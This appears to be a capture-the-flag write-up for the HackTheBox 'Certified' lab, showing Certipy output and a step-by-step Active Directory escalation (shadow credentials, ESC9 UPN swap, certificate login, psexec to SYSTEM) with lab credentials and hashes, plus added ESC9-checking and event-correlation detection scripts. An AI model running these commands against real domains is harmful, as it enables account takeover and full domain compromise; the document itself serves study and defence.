CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
CA Name : DC01.certified.htb\certified-DC01-CA
Template Name : SubCA
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
Object Control Permissions
Owner : CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
WriteOwner Principals : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
WriteDacl Principals : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
WriteProperty Principals : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
certipy find -u 'CA_OPERATOR@certified.htb' -p 'Password123!' -dc-ip 10.10.11.41 -vulnerable -enable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'certified-DC01-CA'
[*] Saved BloodHound data to '20250109221632_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250109221632_Certipy.txt'
[*] Saved JSON output to '20250109221632_Certipy.json'
cat 20250109221632_Certipy.txt
Certificate Authorities
0
CA Name : certified-DC01-CA
DNS Name : DC01.certified.htb
Certificate Subject : CN=certified-DC01-CA, DC=certified, DC=htb
Certificate Serial Number : 36472F2C180FBB9B4983AD4D60CD5A9D
Certificate Validity Start : 2024-05-13 15:33:41+00:00
Certificate Validity End : 2124-05-13 15:43:41+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : CERTIFIED.HTB\Administrators
Access Rights
ManageCertificates : CERTIFIED.HTB\Administrators
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
ManageCa : CERTIFIED.HTB\Administrators
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Enroll : CERTIFIED.HTB\Authenticated Users
Certificate Templates
0
Template Name : CertifiedAuthentication
Display Name : Certified Authentication
Certificate Authorities : certified-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireDirectoryPath
SubjectAltRequireUpn
Enrollment Flag : NoSecurityExtension
AutoEnrollment
PublishToDs
Private Key Flag : 16777216
65536
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFIED.HTB\operator ca
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Object Control Permissions
Owner : CERTIFIED.HTB\Administrator
Write Owner Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
CERTIFIED.HTB\Administrator
Write Dacl Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
CERTIFIED.HTB\Administrator
Write Property Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
CERTIFIED.HTB\Administrator
[!] Vulnerabilities
ESC9 : 'CERTIFIED.HTB\\operator ca' can enroll and template has no security extension
(certipy writes the same report as 20250109221632_Certipy.json.)

Why this is ESC9: the CertifiedAuthentication template has CT_FLAG_NO_SECURITY_EXTENSION in its enrollment flags, so certificates it issues carry no szOID_NTDS_CA_SECURITY_EXT (1.3.6.1.4.1.311.25.2) extension with the requester's SID. A DC that is not in full StrongCertificateBindingEnforcement mode then maps such a certificate to an account by the UPN in its SAN alone. ca_operator can enroll, and management_svc has GenericAll over ca_operator, so the plan is: set ca_operator's userPrincipalName to administrator, enroll as ca_operator, put the UPN back, and authenticate with a certificate that now maps to Administrator. The KB5014754 hardening schedule ends in full enforcement by default, which closes this path.
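The rule behind that finding, as an added example that is not Certipy's code: the script applies the ESC9 conditions to a Certipy JSON export. SAMPLE_REPORT is a constructed subset of the 20250109221632_Certipy report on this page with the same field names, plus two made-up templates for contrast (one with the flag cleared, one only admins can enroll in). Whether the DC actually accepts such a certificate still depends on its StrongCertificateBindingEnforcement setting, which the export does not show.

```python
"""Apply the ESC9 rule to a Certipy JSON export.

Added example, not Certipy's code. A template matches when it is enabled,
usable for client authentication, needs no manager approval and no
authorized signatures, has CT_FLAG_NO_SECURITY_EXTENSION set, and grants
enrollment to a principal outside the admin groups.
"""
import json
import sys

PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators", "Administrator"}
CLIENT_AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
                    "Smart Card Logon", "Any Purpose"}


def low_priv_enrollers(template: dict) -> list:
    rights = template["Permissions"]["Enrollment Permissions"].get("Enrollment Rights", [])
    return [p for p in rights if p.split("\\", 1)[-1] not in PRIVILEGED]


def usable_for_client_auth(template: dict) -> bool:
    ekus = set(template.get("Extended Key Usage", []))
    # an empty EKU set means any purpose, which the KDC also accepts
    return bool(ekus & CLIENT_AUTH_EKUS) or not ekus


def is_esc9(template: dict) -> bool:
    return (template.get("Enabled", False)
            and usable_for_client_auth(template)
            and not template.get("Requires Manager Approval", False)
            and template.get("Authorized Signatures Required", 0) == 0
            and "NoSecurityExtension" in template.get("Enrollment Flag", [])
            and bool(low_priv_enrollers(template)))


def find_esc9(report: dict) -> list:
    """[(template name, [non-admin enrollers])] for every template matching the rule."""
    return [(t["Template Name"], low_priv_enrollers(t))
            for t in report["Certificate Templates"].values() if is_esc9(t)]


def template(name, flags, ekus, rights, enabled=True, approval=False):
    """Helper to write the constructed templates compactly in Certipy's shape."""
    return {"Template Name": name, "Enabled": enabled, "Extended Key Usage": ekus,
            "Enrollment Flag": flags, "Requires Manager Approval": approval,
            "Authorized Signatures Required": 0,
            "Permissions": {"Enrollment Permissions": {"Enrollment Rights": rights}}}


ADMINS = ["CERTIFIED.HTB\\Domain Admins", "CERTIFIED.HTB\\Enterprise Admins"]
SAMPLE_REPORT = {"Certificate Templates": {
    # as reported on this page
    "0": template("CertifiedAuthentication", ["NoSecurityExtension", "AutoEnrollment", "PublishToDs"],
                  ["Server Authentication", "Client Authentication"],
                  ["CERTIFIED.HTB\\operator ca"] + ADMINS),
    # constructed: the same template with the flag cleared, i.e. the fix
    "1": template("CertifiedAuthenticationFixed", ["AutoEnrollment", "PublishToDs"],
                  ["Server Authentication", "Client Authentication"],
                  ["CERTIFIED.HTB\\operator ca"] + ADMINS),
    # constructed: flag set but only admins can enroll, so nothing to escalate
    "2": template("AdminOnlyNoExt", ["NoSecurityExtension"], ["Client Authentication"], ADMINS),
}}

if __name__ == "__main__":
    report = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_REPORT
    for name, enrollers in find_esc9(report):
        print("ESC9: %s enrollable by %s" % (name, ", ".join(enrollers)))
```

Run it with the path to a real Certipy JSON export to re-check a report; the remediation is the "1" case, clearing CT_FLAG_NO_SECURITY_EXTENSION from msPKI-Enrollment-Flag on the template so issued certificates carry the SID again.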
path to root
set owner of the Management group to judith, grant her WriteMembers, add her to the group:
owneredit.py -action write -new-owner 'judith.mader' -target 'Management' CERTIFIED/judith.mader:judith09 -dc-ip 10.10.11.41
dacledit.py -action write -rights WriteMembers -principal 'judith.mader' -target-dn 'CN=Management,CN=Users,DC=certified,DC=htb' CERTIFIED/judith.mader:judith09 -dc-ip 10.10.11.41
net rpc group addmem "Management" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S "10.10.11.41"
Used pywhisker to create a certificate for management_svc:
pywhisker -d "certified.htb" -u "judith.mader" -p judith09 --target "management_svc" --action add
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: f713e519-86a9-41b7-4840-6a1c4edadf62
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: xqaD7t8D.pfx
[*] Must be used with password: NgG9LRZMXBNJQNkofKVj
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Generated a Kerberos TGT for management_svc:
sudo ntpdate 10.10.11.41 & python3 /opt/linux/PKINITtools/gettgtpkinit.py certified.htb/management_svc -cert-pfx ./xqaD7t8D.pfx -pfx-pass NgG9LRZMXBNJQNkofKVj management_svc.ccache
[1] 369069
2025-01-10 06:31:05.570272 (-0500) +25201.672012 +/- 0.009065 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25201.672012
[1] + done sudo ntpdate 10.10.11.41
2025-01-10 06:31:05,707 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-01-10 06:31:05,719 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-01-09 23:31:09,843 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-01-09 23:31:09,843 minikerberos INFO 532544495529653ddc9df23d1f1d9dbdf50da4dfa817a2439701e1ead6afbb25
INFO:minikerberos:532544495529653ddc9df23d1f1d9dbdf50da4dfa817a2439701e1ead6afbb25
2025-01-09 23:31:09,845 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
export KRB5CCNAME=/home/sake/htb-labs/Certified/management_svc.ccache
Extracted the NT hash for management_svc with getnthash.py (it requests a U2U service ticket to the account itself with the TGT and decrypts the PAC credential info using the AS-REP key printed above):
sudo ntpdate 10.10.11.41 & python3 /opt/linux/PKINITtools/getnthash.py certified.htb/management_svc -key 532544495529653ddc9df23d1f1d9dbdf50da4dfa817a2439701e1ead6afbb25
[1] 371340
2025-01-10 06:33:01.831006 (-0500) +25200.265573 +/- 0.010868 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25200.265573
[1] + done sudo ntpdate 10.10.11.41
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c183...
Used certipy-ad to add a KeyCredential to ca_operator (management_svc has GenericAll over it); shadow auto adds the key, authenticates with it, recovers the NT hash and restores the original msDS-KeyCredentialLink, so ca_operator's password does not have to be changed:
sudo ntpdate 10.10.11.41 & certipy-ad shadow auto -u management_svc@certified.htb -hashes a091c183... -account ca_operator
[1] 373605
2025-01-10 06:34:32.131964 (-0500) +25200.267514 +/- 0.009241 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25200.267514
[1] + done sudo ntpdate 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '5f80301d-c70f-0237-552c-9d6ca8a4086b'
[*] Adding Key Credential with device ID '5f80301d-c70f-0237-552c-9d6ca8a4086b' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID '5f80301d-c70f-0237-552c-9d6ca8a4086b' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': 2b576acb...
Updated the UPN (userPrincipalName) of ca_operator to administrator, so a certificate issued to ca_operator will carry that UPN in its SAN:
sudo ntpdate 10.10.11.41 & certipy-ad account update -u management_svc@certified.htb -hashes a091c183... -user ca_operator -upn administrator
[1] 376862
2025-01-10 06:36:28.337475 (-0500) +25200.273665 +/- 0.011748 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25200.273665
[1] + done sudo ntpdate 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : administrator
[*] Successfully updated 'ca_operator'
Requested a certificate for the administrator account using certipy-ad (enrolling as ca_operator in the CertifiedAuthentication template; the UPN is taken from the account at request time and, because of NoSecurityExtension, no SID is embedded):
sudo ntpdate 10.10.11.41 & certipy-ad req -username ca_operator@certified.htb -hashes 2b576acb... -ca certified-DC01-CA -template CertifiedAuthentication
[1] 379438
2025-01-10 06:37:37.878449 (-0500) +25200.403687 +/- 0.011098 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25200.403687
[1] + done sudo ntpdate 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Restored ca_operator’s UPN to its original value (required before authenticating, otherwise the KDC would map the certificate's UPN back to ca_operator):
sudo ntpdate 10.10.11.41 & certipy-ad account update -u management_svc@certified.htb -hashes a091c183... -user ca_operator -upn ca_operator@certified.htb
Authenticated as administrator with the new certificate (the DC maps it by UPN alone because it carries no SID; this only works while the DC is not in full StrongCertificateBindingEnforcement mode):
sudo ntpdate -u 10.10.11.41 & certipy-ad auth -pfx administrator.pfx -domain certified.htb
[1] 408529
2025-01-10 06:46:40.329123 (-0500) +25200.298367 +/- 0.013500 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25200.298367
[1] + done sudo ntpdate -u 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435...:0d5b4960...

use admin hash to psexec
impacket-psexec administrator@10.10.11.41 -hashes :0d5b4960...
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.11.41.....
[*] Found writable share ADMIN$
[*] Uploading file ffZcpYFZ.exe
[*] Opening SVCManager on 10.10.11.41.....
[*] Creating service fvOJ on 10.10.11.41.....
[*] Starting service fvOJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6414]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system

root.txt
C:\Users\Administrator\Desktop> type root.txt
0bc44169...
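The chain above leaves a recognisable trail on the DC and the CA. The script below is an added example, not part of the writeup: it correlates the relevant events (5136 directory object modified, 4738 user account changed, 4887 certificate issued, 4768 TGT requested with pre-authentication type 16, i.e. PKINIT). Event IDs and field names follow those events' XML, but the records are constructed, simplified JSON objects with invented timestamps laid out in the page's order, not captured logs; the ca_operator DN and the client IP are assumed.

```python
"""Correlate the Windows security events this chain leaves on the DC and the CA.

Added example, not part of the writeup. SAMPLE_EVENTS are constructed,
simplified records (real event IDs and field names, invented timestamps).
"""
from datetime import datetime, timedelta

# DN -> sAMAccountName, the lookup a SIEM would do against its directory inventory
ACCOUNTS = {
    "CN=management service,CN=Users,DC=certified,DC=htb": "management_svc",  # DN from pywhisker output
    "CN=ca_operator,CN=Users,DC=certified,DC=htb": "ca_operator",            # assumed DN
    "CN=Administrator,CN=Users,DC=certified,DC=htb": "administrator",
}

SAMPLE_EVENTS = [  # constructed
    {"t": "2025-01-10T04:33:00Z", "EventID": 5136, "SubjectUserName": "judith.mader",
     "ObjectDN": "CN=management service,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"t": "2025-01-10T11:34:33Z", "EventID": 5136, "SubjectUserName": "management_svc",
     "ObjectDN": "CN=ca_operator,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"t": "2025-01-10T11:34:45Z", "EventID": 5136, "SubjectUserName": "management_svc",
     "ObjectDN": "CN=ca_operator,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Deleted"},
    {"t": "2025-01-10T11:36:29Z", "EventID": 4738, "SubjectUserName": "management_svc",
     "TargetUserName": "ca_operator", "UserPrincipalName": "administrator"},
    {"t": "2025-01-10T11:37:40Z", "EventID": 4887, "Requester": "CERTIFIED\\ca_operator",
     "RequestId": 4, "Attributes": "CertificateTemplate:CertifiedAuthentication"},
    {"t": "2025-01-10T11:40:00Z", "EventID": 4738, "SubjectUserName": "management_svc",
     "TargetUserName": "ca_operator", "UserPrincipalName": "ca_operator@certified.htb"},
    {"t": "2025-01-10T11:46:42Z", "EventID": 4768, "TargetUserName": "administrator",
     "PreAuthType": "16", "IpAddress": "10.10.14.5"},
]


def parse_time(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def correlate(events, accounts, window=timedelta(hours=1)):
    """Return (rule, actor, target) tuples in event order."""
    names = set(accounts.values())
    findings, swaps = [], []          # swaps: (time, victim, impersonated name)
    for e in sorted(events, key=lambda ev: ev["t"]):
        t, eid = parse_time(e["t"]), e["EventID"]
        if eid == 5136 and e.get("AttributeLDAPDisplayName") == "msDS-KeyCredentialLink":
            target = accounts.get(e["ObjectDN"], e["ObjectDN"])
            # a key credential added to an account by someone other than that account
            if e.get("OperationType") == "Value Added" and e["SubjectUserName"].lower() != target.lower():
                findings.append(("shadow-credentials", e["SubjectUserName"], target))
        elif eid == 4738 and e.get("UserPrincipalName", "-") != "-":
            victim = e["TargetUserName"].lower()
            upn_name = e["UserPrincipalName"].split("@", 1)[0].lower()
            # UPN rewritten to the name of a different existing account
            if upn_name != victim and upn_name in names:
                swaps.append((t, victim, upn_name))
                findings.append(("upn-swap", victim, upn_name))
        elif eid == 4887:
            requester = e["Requester"].split("\\", 1)[-1].lower()
            for st, victim, name in swaps:
                if victim == requester and timedelta(0) <= t - st <= window:
                    findings.append(("cert-issued-during-upn-swap", requester, name))
        elif eid == 4768 and e.get("PreAuthType") == "16":
            user = e["TargetUserName"].lower()
            for st, victim, name in swaps:
                if name == user and timedelta(0) <= t - st <= window:
                    findings.append(("pkinit-logon-after-upn-swap", victim, user))
    return findings


if __name__ == "__main__":
    for rule, actor, target in correlate(SAMPLE_EVENTS, ACCOUNTS):
        print("%-30s %-16s -> %s" % (rule, actor, target))
```

5136 needs Directory Service Changes auditing with a SACL on the user objects, and 4887 comes from the CA host, so both logs have to be forwarded to the same place for the correlation to work. The upn-swap rule on its own is the cheapest signal: a userPrincipalName rewritten to another account's name has no legitimate use.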